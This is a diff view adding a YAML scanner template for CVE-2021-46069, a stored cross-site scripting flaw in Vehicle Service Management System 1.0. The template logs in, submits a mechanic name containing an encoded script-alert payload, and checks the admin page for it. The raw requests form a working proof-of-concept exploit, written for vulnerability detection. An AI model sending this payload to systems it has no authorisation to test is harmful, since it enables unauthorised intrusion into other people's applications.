Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
-
-
-
-
-
1 + id: CVE-2021-46069 2 + 3 + info: 4 + name: Vehicle Service Management System - Stored Cross Site Scripting 5 + author: TenBird 6 + severity: medium 7 + description: | 8 + A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel. 9 + reference: 10 + - https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS 11 + - https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss 12 + - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html 13 + - https://nvd.nist.gov/vuln/detail/CVE-2021-46069 14 + classification: 15 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N 16 + cvss-score: 4.8 17 + cve-id: CVE-2021-46069 18 + cwe-id: CWE-79 19 + metadata: 20 + verified: "true" 21 + tags: cve,cve2021,xss,vms,authenticated 22 + requests: 23 + - raw: 24 + - | 25 + POST /vehicle_service/classes/Login.php?f=login HTTP/1.1 26 + Host: {{Hostname}} 27 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 28 + 29 + username={{username}}&password={{password}} 30 + 31 + - | 32 + POST /vehicle_service/classes/Master.php?f=save_mechanic HTTP/1.1 33 + Host: {{Hostname}} 34 + Content-Type: application/x-www-form-urlencoded 35 + 36 + id=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&[email protected]&status=1 37 + 38 + - | 39 + GET /vehicle_service/admin/?page=mechanics HTTP/1.1 40 + Host: {{Hostname}} 41 + 42 + req-condition: true 43 + redirects: true 44 + max-redirects: 2 45 + cookie-reuse: true 46 + matchers-condition: and 47 + matchers: 48 + - type: dsl 49 + dsl: 50 + - "contains(all_headers_3, 'text/html')" 51 + - "status_code_3 == 200" 52 + - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")' 53 + condition: and 54 + -
-
-
-
-
-
-
-
-
-
-
-